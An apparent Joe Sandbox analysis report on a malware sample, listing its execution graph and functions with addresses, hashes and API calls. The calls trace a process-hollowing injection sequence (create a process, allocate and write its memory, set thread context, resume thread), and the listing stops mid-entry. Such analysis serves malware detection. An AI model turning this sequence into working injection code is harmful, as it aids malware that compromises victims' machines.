                                  execution_graph 26047 8720f80 26048 872110b 26047->26048 26049 8720fa6 26047->26049 26049->26048 26052 8721200 PostMessageW 26049->26052 26054 87211f8 26049->26054 26053 872126c 26052->26053 26053->26049 26055 87211fd PostMessageW 26054->26055 26056 872126c 26055->26056 26056->26049 26014 9fb478 26017 9fb55f 26014->26017 26015 9fb487 26018 9fb581 26017->26018 26019 9fb5a4 26017->26019 26018->26019 26025 9fb7f8 26018->26025 26029 9fb808 26018->26029 26019->26015 26020 9fb59c 26020->26019 26021 9fb7a8 GetModuleHandleW 26020->26021 26022 9fb7d5 26021->26022 26022->26015 26026 9fb81c 26025->26026 26027 9fb841 26026->26027 26033 9fafb0 26026->26033 26027->26020 26030 9fb81c 26029->26030 26031 9fb841 26030->26031 26032 9fafb0 LoadLibraryExW 26030->26032 26031->26020 26032->26031 26034 9fb9e8 LoadLibraryExW 26033->26034 26036 9fba61 26034->26036 26036->26027 26037 9fd7f8 26038 9fd83e GetCurrentProcess 26037->26038 26040 9fd890 GetCurrentThread 26038->26040 26042 9fd889 26038->26042 26041 9fd8cd GetCurrentProcess 26040->26041 26043 9fd8c6 26040->26043 26044 9fd903 GetCurrentThreadId 26041->26044 26042->26040 26043->26041 26046 9fd95c 26044->26046 26057 9f4668 26058 9f467a 26057->26058 26060 9f4686 26058->26060 26061 9f4778 26058->26061 26062 9f479d 26061->26062 26066 9f4879 26062->26066 26070 9f4888 26062->26070 26067 9f48af 26066->26067 26069 9f498c 26067->26069 26074 9f44e4 26067->26074 26072 9f48af 26070->26072 26071 9f498c 26071->26071 26072->26071 26073 9f44e4 CreateActCtxA 26072->26073 26073->26071 26075 9f5918 CreateActCtxA 26074->26075 26077 9f59db 26075->26077 26077->26077 25855 502d6da 25860 502f7c0 25855->25860 25874 502f836 25855->25874 25889 502f7d0 25855->25889 25856 502d6ee 25861 502f7ea 25860->25861 25872 502f7f2 25861->25872 25903 872026d 25861->25903 25908 872032f 25861->25908 25913 872010f 25861->25913 25921 872015e 25861->25921 25926 87201d8 25861->25926 25933 872083b 25861->25933 25938 87201fb 25861->25938 25945 872028a 25861->25945 25949 8720195 25861->25949 25954 8720440 25861->25954 25959 8720533 25861->25959 25872->25856 25875 502f7c4 25874->25875 25876 502f839 25874->25876 25877 8720533 2 API calls 25875->25877 25878 8720440 2 API calls 25875->25878 25879 8720195 2 API calls 25875->25879 25880 872028a 2 API calls 25875->25880 25881 87201fb 4 API calls 25875->25881 25882 872083b 2 API calls 25875->25882 25883 87201d8 4 API calls 25875->25883 25884 872015e 2 API calls 25875->25884 25885 872010f 4 API calls 25875->25885 25886 872032f 2 API calls 25875->25886 25887 502f7f2 25875->25887 25888 872026d 2 API calls 25875->25888 25876->25856 25877->25887 25878->25887 25879->25887 25880->25887 25881->25887 25882->25887 25883->25887 25884->25887 25885->25887 25886->25887 25887->25856 25888->25887 25890 502f7ea 25889->25890 25891 8720533 2 API calls 25890->25891 25892 8720440 2 API calls 25890->25892 25893 8720195 2 API calls 25890->25893 25894 872028a 2 API calls 25890->25894 25895 87201fb 4 API calls 25890->25895 25896 872083b 2 API calls 25890->25896 25897 87201d8 4 API calls 25890->25897 25898 872015e 2 API calls 25890->25898 25899 872010f 4 API calls 25890->25899 25900 872032f 2 API calls 25890->25900 25901 502f7f2 25890->25901 25902 872026d 2 API calls 25890->25902 25891->25901 25892->25901 25893->25901 25894->25901 25895->25901 25896->25901 25897->25901 25898->25901 25899->25901 25900->25901 25901->25856 25902->25901 25904 8720978 25903->25904 25964 502cf60 25904->25964 25968 502cf68 25904->25968 25905 87208d9 25905->25872 25909 8720335 25908->25909 25972 502d020 25909->25972 25976 502d028 25909->25976 25910 87203b4 25910->25872 25914 872013f 25913->25914 25980 502d2a4 25913->25980 25984 502d2b0 25913->25984 25915 872066a 25914->25915 25988 502ce88 25914->25988 25992 502ce90 25914->25992 25915->25872 25916 87200f8 25916->25872 25922 872016a 25921->25922 25924 502ce90 Wow64SetThreadContext 25922->25924 25925 502ce88 Wow64SetThreadContext 25922->25925 25923 87200f8 25923->25872 25924->25923 25925->25923 25927 87201e9 25926->25927 25928 87201a3 25926->25928 25931 502ce90 Wow64SetThreadContext 25927->25931 25932 502ce88 Wow64SetThreadContext 25927->25932 25996 502cde0 25928->25996 26000 502cdd8 25928->26000 25931->25928 25932->25928 25934 872016a 25933->25934 25934->25933 25936 502ce90 Wow64SetThreadContext 25934->25936 25937 502ce88 Wow64SetThreadContext 25934->25937 25935 87200f8 25935->25872 25936->25935 25937->25935 25939 87201ff 25938->25939 25943 502ce90 Wow64SetThreadContext 25939->25943 25944 502ce88 Wow64SetThreadContext 25939->25944 25940 87201a3 25941 502cde0 ResumeThread 25940->25941 25942 502cdd8 ResumeThread 25940->25942 25941->25940 25942->25940 25943->25940 25944->25940 25946 87202a2 25945->25946 25947 502cde0 ResumeThread 25946->25947 25948 502cdd8 ResumeThread 25946->25948 25947->25946 25948->25946 25951 872024c 25949->25951 25950 872081e 25951->25950 25952 502d020 WriteProcessMemory 25951->25952 25953 502d028 WriteProcessMemory 25951->25953 25952->25951 25953->25951 25955 8720463 25954->25955 25957 502d020 WriteProcessMemory 25955->25957 25958 502d028 WriteProcessMemory 25955->25958 25956 87204ba 25956->25872 25957->25956 25958->25956 25960 8720539 25959->25960 26004 502d117 25960->26004 26008 502d118 25960->26008 25961 872055c 25961->25872 25965 502cfa8 VirtualAllocEx 25964->25965 25967 502cfe5 25965->25967 25967->25905 25969 502cfa8 VirtualAllocEx 25968->25969 25971 502cfe5 25969->25971 25971->25905 25973 502d070 WriteProcessMemory 25972->25973 25975 502d0c7 25973->25975 25975->25910 25977 502d070 WriteProcessMemory 25976->25977 25979 502d0c7 25977->25979 25979->25910 25981 502d2b0 25980->25981 25981->25981 25982 502d49e CreateProcessA 25981->25982 25983 502d4fb 25982->25983 25985 502d339 CreateProcessA 25984->25985 25987 502d4fb 25985->25987 25989 502ced5 Wow64SetThreadContext 25988->25989 25991 502cf1d 25989->25991 25991->25916 25993 502ced5 Wow64SetThreadContext 25992->25993 25995 502cf1d 25993->25995 25995->25916 25997 502ce20 ResumeThread 25996->25997 25999 502ce51 25997->25999 25999->25928 26001 502ce20 ResumeThread 26000->26001 26003 502ce51 26001->26003 26003->25928 26005 502d163 ReadProcessMemory 26004->26005 26007 502d1a7 26005->26007 26007->25961 26009 502d163 ReadProcessMemory 26008->26009 26011 502d1a7 26009->26011 26011->25961 26012 9fda40 DuplicateHandle 26013 9fdad6 26012->26013

                                  Executed Functions

                                  Function 009FD7F8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 296 9fd7f8-9fd887 GetCurrentProcess 300 9fd889-9fd88f 296->300 301 9fd890-9fd8c4 GetCurrentThread 296->301 300->301 302 9fd8cd-9fd901 GetCurrentProcess 301->302 303 9fd8c6-9fd8cc 301->303 304 9fd90a-9fd922 302->304 305 9fd903-9fd909 302->305 303->302 309 9fd92b-9fd95a GetCurrentThreadId 304->309 305->304 310 9fd95c-9fd962 309->310 311 9fd963-9fd9c5 309->311 310->311
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 009FD876
                                  • GetCurrentThread.KERNEL32 ref: 009FD8B3
                                  • GetCurrentProcess.KERNEL32 ref: 009FD8F0
                                  • GetCurrentThreadId.KERNEL32 ref: 009FD949
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: eacd7f0ea01707dbc08b3b15bf2fa8623ac724c01fbd7d6c33b8efa7d1b9833f
                                  • Instruction ID: 9438f1499a059b2e1b60b8d2d7a82cf8d48e5813c00521ed4bbef49aa929fee6
                                  • Opcode Fuzzy Hash: eacd7f0ea01707dbc08b3b15bf2fa8623ac724c01fbd7d6c33b8efa7d1b9833f
                                  • Instruction Fuzzy Hash: FD5167B0D013098FDB54DFA9D548BAEBBF6FF88314F208459E109A7360D7749984CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502D2A4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 486 502d2a4-502d345 489 502d347-502d351 486->489 490 502d37e-502d39e 486->490 489->490 491 502d353-502d355 489->491 497 502d3a0-502d3aa 490->497 498 502d3d7-502d406 490->498 493 502d357-502d361 491->493 494 502d378-502d37b 491->494 495 502d363 493->495 496 502d365-502d374 493->496 494->490 495->496 496->496 499 502d376 496->499 497->498 500 502d3ac-502d3ae 497->500 504 502d408-502d412 498->504 505 502d43f-502d4f9 CreateProcessA 498->505 499->494 502 502d3b0-502d3ba 500->502 503 502d3d1-502d3d4 500->503 506 502d3be-502d3cd 502->506 507 502d3bc 502->507 503->498 504->505 508 502d414-502d416 504->508 518 502d502-502d588 505->518 519 502d4fb-502d501 505->519 506->506 509 502d3cf 506->509 507->506 510 502d418-502d422 508->510 511 502d439-502d43c 508->511 509->503 513 502d426-502d435 510->513 514 502d424 510->514 511->505 513->513 515 502d437 513->515 514->513 515->511 529 502d58a-502d58e 518->529 530 502d598-502d59c 518->530 519->518 529->530 531 502d590 529->531 532 502d59e-502d5a2 530->532 533 502d5ac-502d5b0 530->533 531->530 532->533 534 502d5a4 532->534 535 502d5b2-502d5b6 533->535 536 502d5c0-502d5c4 533->536 534->533 535->536 537 502d5b8 535->537 538 502d5d6-502d5dd 536->538 539 502d5c6-502d5cc 536->539 537->536 540 502d5f4 538->540 541 502d5df-502d5ee 538->541 539->538 543 502d5f5 540->543 541->540 543->543
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502D4E6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 28b93140af4230aa21f3888dbc28fa8622b860c23445dc4c351ba4fb212aff26
                                  • Instruction ID: e235f048bdc0aaec4d1ad167a86bf6d62d182e56edfa78fecd5e42a5e16e6d27
                                  • Opcode Fuzzy Hash: 28b93140af4230aa21f3888dbc28fa8622b860c23445dc4c351ba4fb212aff26
                                  • Instruction Fuzzy Hash: E9A17F71D00629DFDB20DFA8D845BEDBBF2BF48314F14816AD809A7290DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502D2B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 544 502d2b0-502d345 546 502d347-502d351 544->546 547 502d37e-502d39e 544->547 546->547 548 502d353-502d355 546->548 554 502d3a0-502d3aa 547->554 555 502d3d7-502d406 547->555 550 502d357-502d361 548->550 551 502d378-502d37b 548->551 552 502d363 550->552 553 502d365-502d374 550->553 551->547 552->553 553->553 556 502d376 553->556 554->555 557 502d3ac-502d3ae 554->557 561 502d408-502d412 555->561 562 502d43f-502d4f9 CreateProcessA 555->562 556->551 559 502d3b0-502d3ba 557->559 560 502d3d1-502d3d4 557->560 563 502d3be-502d3cd 559->563 564 502d3bc 559->564 560->555 561->562 565 502d414-502d416 561->565 575 502d502-502d588 562->575 576 502d4fb-502d501 562->576 563->563 566 502d3cf 563->566 564->563 567 502d418-502d422 565->567 568 502d439-502d43c 565->568 566->560 570 502d426-502d435 567->570 571 502d424 567->571 568->562 570->570 572 502d437 570->572 571->570 572->568 586 502d58a-502d58e 575->586 587 502d598-502d59c 575->587 576->575 586->587 588 502d590 586->588 589 502d59e-502d5a2 587->589 590 502d5ac-502d5b0 587->590 588->587 589->590 591 502d5a4 589->591 592 502d5b2-502d5b6 590->592 593 502d5c0-502d5c4 590->593 591->590 592->593 594 502d5b8 592->594 595 502d5d6-502d5dd 593->595 596 502d5c6-502d5cc 593->596 594->593 597 502d5f4 595->597 598 502d5df-502d5ee 595->598 596->595 600 502d5f5 597->600 598->597 600->600
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502D4E6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 54a8a4c46cf80edbe67357b307274e08492207895af057c52a7272e637dada3d
                                  • Instruction ID: c7d50a1e5d1a8bc928b2301ba33452ad51a35c8043fb17a51fd2474cb5a20b54
                                  • Opcode Fuzzy Hash: 54a8a4c46cf80edbe67357b307274e08492207895af057c52a7272e637dada3d
                                  • Instruction Fuzzy Hash: 60915D71D00629DFDB20DFA8D845BEDBBF2BF48314F14816AD809A7290DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009FB55F Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 601 9fb55f-9fb57f 602 9fb5ab-9fb5af 601->602 603 9fb581-9fb58e call 9f8ac0 601->603 604 9fb5c3-9fb604 602->604 605 9fb5b1-9fb5bb 602->605 608 9fb5a4 603->608 609 9fb590 603->609 612 9fb606-9fb60e 604->612 613 9fb611-9fb61f 604->613 605->604 608->602 656 9fb596 call 9fb7f8 609->656 657 9fb596 call 9fb808 609->657 612->613 615 9fb643-9fb645 613->615 616 9fb621-9fb626 613->616 614 9fb59c-9fb59e 614->608 619 9fb6e0-9fb7a0 614->619 620 9fb648-9fb64f 615->620 617 9fb628-9fb62f call 9faf54 616->617 618 9fb631 616->618 622 9fb633-9fb641 617->622 618->622 651 9fb7a8-9fb7d3 GetModuleHandleW 619->651 652 9fb7a2-9fb7a5 619->652 623 9fb65c-9fb663 620->623 624 9fb651-9fb659 620->624 622->620 626 9fb665-9fb66d 623->626 627 9fb670-9fb679 call 9faf64 623->627 624->623 626->627 632 9fb67b-9fb683 627->632 633 9fb686-9fb68b 627->633 632->633 635 9fb68d-9fb694 633->635 636 9fb6a9-9fb6b6 633->636 635->636 637 9fb696-9fb6a6 call 9faf74 call 9faf84 635->637 642 9fb6d9-9fb6df 636->642 643 9fb6b8-9fb6d6 636->643 637->636 643->642 653 9fb7dc-9fb7f0 651->653 654 9fb7d5-9fb7db 651->654 652->651 654->653 656->614 657->614
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB7C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 83d728ae79f2ef8caa57ede6695cfe1aabe8cf0226c93fe244c0025eae31ba4f
                                  • Instruction ID: 1c911ede7d46075806eddbd016ab424556c4ea8baa24794c15395c41b6218ef5
                                  • Opcode Fuzzy Hash: 83d728ae79f2ef8caa57ede6695cfe1aabe8cf0226c93fe244c0025eae31ba4f
                                  • Instruction Fuzzy Hash: 338169B0A00B488FDB24DF29D4447AABBF5FF88310F10892DD18AD7A50D774E94ACB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009F590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 658 9f590c-9f59d9 CreateActCtxA 660 9f59db-9f59e1 658->660 661 9f59e2-9f5a3c 658->661 660->661 668 9f5a3e-9f5a41 661->668 669 9f5a4b-9f5a4f 661->669 668->669 670 9f5a51-9f5a5d 669->670 671 9f5a60 669->671 670->671 673 9f5a61 671->673 673->673
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 7857efd9e6024c8065b7e97eef178a29431f84008d3b902d4eb6420c6de1ea55
                                  • Instruction ID: 599d059cc0269924bc9bed4c9fc6d78666fcec075b4b6e5a9090c5ec9d72a531
                                  • Opcode Fuzzy Hash: 7857efd9e6024c8065b7e97eef178a29431f84008d3b902d4eb6420c6de1ea55
                                  • Instruction Fuzzy Hash: 8741FFB0C00619CBDB24CFA9C884BDEBBB5BF88304F21816AD109AB251DB765946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009F44E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 674 9f44e4-9f59d9 CreateActCtxA 677 9f59db-9f59e1 674->677 678 9f59e2-9f5a3c 674->678 677->678 685 9f5a3e-9f5a41 678->685 686 9f5a4b-9f5a4f 678->686 685->686 687 9f5a51-9f5a5d 686->687 688 9f5a60 686->688 687->688 690 9f5a61 688->690 690->690
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: a808cc5d8ca91d4cb21a8a52a871a9dcd6a80eef8748c05f06f4cef287a332f5
                                  • Instruction ID: 2a52a759e9757de5acaaca28837bc6aeb7923ff45f02d3c33ed3de9968afb26f
                                  • Opcode Fuzzy Hash: a808cc5d8ca91d4cb21a8a52a871a9dcd6a80eef8748c05f06f4cef287a332f5
                                  • Instruction Fuzzy Hash: 1F4103B0C0071DCBDB24CFA9C884B9EBBF5BF48304F21806AD619AB255DBB56945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502D020 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 691 502d020-502d076 693 502d086-502d0c5 WriteProcessMemory 691->693 694 502d078-502d084 691->694 696 502d0c7-502d0cd 693->696 697 502d0ce-502d0fe 693->697 694->693 696->697
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502D0B8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: ad8812362c661a081ff110f4e482a1ed4feaec54f2f6d9491bc913467f04ecaf
                                  • Instruction ID: c4299901f45b8d1b972f9a086c06efb31f2aec870e96970153aee331edfa7829
                                  • Opcode Fuzzy Hash: ad8812362c661a081ff110f4e482a1ed4feaec54f2f6d9491bc913467f04ecaf
                                  • Instruction Fuzzy Hash: E22146B19003599FCB10CFAAD884BEEBBF1FF48310F50842AE959A7250C7789945CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502D028 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 701 502d028-502d076 703 502d086-502d0c5 WriteProcessMemory 701->703 704 502d078-502d084 701->704 706 502d0c7-502d0cd 703->706 707 502d0ce-502d0fe 703->707 704->703 706->707
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502D0B8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 09b4b416758b856caaed5e16470a727d33b2a0d9b70fb8b2c2ed7cf908c8023b
                                  • Instruction ID: d7cc536d0db53f28521d2a7b36bd399c1b4755669392d1bb3bce8da9fa17b489
                                  • Opcode Fuzzy Hash: 09b4b416758b856caaed5e16470a727d33b2a0d9b70fb8b2c2ed7cf908c8023b
                                  • Instruction Fuzzy Hash: F32169B19003199FCB10CFAAC884BEEBBF5FF48310F50842AE919A7250C7789941CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502CE88 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 711 502ce88-502cedb 713 502ceeb-502cf1b Wow64SetThreadContext 711->713 714 502cedd-502cee9 711->714 716 502cf24-502cf54 713->716 717 502cf1d-502cf23 713->717 714->713 717->716
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0502CF0E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 61f45f8d1419e8246e51a33f3bf7505513885eddd1e2453336155e76c9d3f2ab
                                  • Instruction ID: fe8fc4508c8db510f37b936ea1aafdd8ec1d3b7b956d7c98b1a619ce6952061b
                                  • Opcode Fuzzy Hash: 61f45f8d1419e8246e51a33f3bf7505513885eddd1e2453336155e76c9d3f2ab
                                  • Instruction Fuzzy Hash: E02125B19042099FDB60DFAAC485BEEBBF4FF48324F14842AD459A7240C7789945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502D117 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502D198
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 512c8b179835c7537c141dd3b0ece84d1b0b0c826473f1a75cb36ea764238321
                                  • Instruction ID: 8f89dc918a2cbb3905495ee1231a72ea5f25951ce8f48a12a7c00f215edb8c03
                                  • Opcode Fuzzy Hash: 512c8b179835c7537c141dd3b0ece84d1b0b0c826473f1a75cb36ea764238321
                                  • Instruction Fuzzy Hash: 782125B1C002599FCB10DFAAD884AEEBBF5FF48310F14842EE559A7250C7789945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502D118 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502D198
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: ef5b4a2174d49de34de2960c4fb41ecfa2ab0cff259fb759c802fb92fd7c7f62
                                  • Instruction ID: a785371323d5c0d13860b907732d5ed393ac0833cf717935cd0d9517ef38de49
                                  • Opcode Fuzzy Hash: ef5b4a2174d49de34de2960c4fb41ecfa2ab0cff259fb759c802fb92fd7c7f62
                                  • Instruction Fuzzy Hash: 692138B1C003599FCB10DFAAC884AEEFBF5FF48310F10842AE519A7250C7389945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502CE90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 721 502ce90-502cedb 723 502ceeb-502cf1b Wow64SetThreadContext 721->723 724 502cedd-502cee9 721->724 726 502cf24-502cf54 723->726 727 502cf1d-502cf23 723->727 724->723 727->726
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0502CF0E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: e69c273cbcca09b6554ed9ad6387625613af0c7da19f99a241a9b314ac49518a
                                  • Instruction ID: 7eff472e0943fa3a4acb4c48adbef9cc5ac6885567e398d8a37f7ce3933dcc64
                                  • Opcode Fuzzy Hash: e69c273cbcca09b6554ed9ad6387625613af0c7da19f99a241a9b314ac49518a
                                  • Instruction Fuzzy Hash: D62135B19043099FDB50DFAAC4857AEBBF4FF48324F14842AD519A7240CB78A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009FDA40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FDAC7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: d2e1696aa9305bf55fbd53588fa5d338095e7f910c89eb9f3a7d92277d9175bf
                                  • Instruction ID: 8a97ac5ca53de61f26a18fa25b3a4d7e30f62c4b4f9264add5d38eb61755df5a
                                  • Opcode Fuzzy Hash: d2e1696aa9305bf55fbd53588fa5d338095e7f910c89eb9f3a7d92277d9175bf
                                  • Instruction Fuzzy Hash: 7621C4B59013489FDB10CF9AD584AEEBBF9FB48310F14841AE918A3350D379A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009FAFB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009FB841,00000800,00000000,00000000), ref: 009FBA52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 25fc899cc22a7a34408e42daf85c2590dc71edbbdb4bb30d4409fd21ea245146
                                  • Instruction ID: a79af771db14590b0d319c3baa448f81ce963b4b2395546542d6a315b3e64096
                                  • Opcode Fuzzy Hash: 25fc899cc22a7a34408e42daf85c2590dc71edbbdb4bb30d4409fd21ea245146
                                  • Instruction Fuzzy Hash: 111117B58003089FCB20CF9AD444AAEFBF9EB48310F10842AD519A7200C379A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502CF60 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502CFD6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 8682b6947b9871f585efd1ac318f04f527220d9e04615a89ccd78eae31e42886
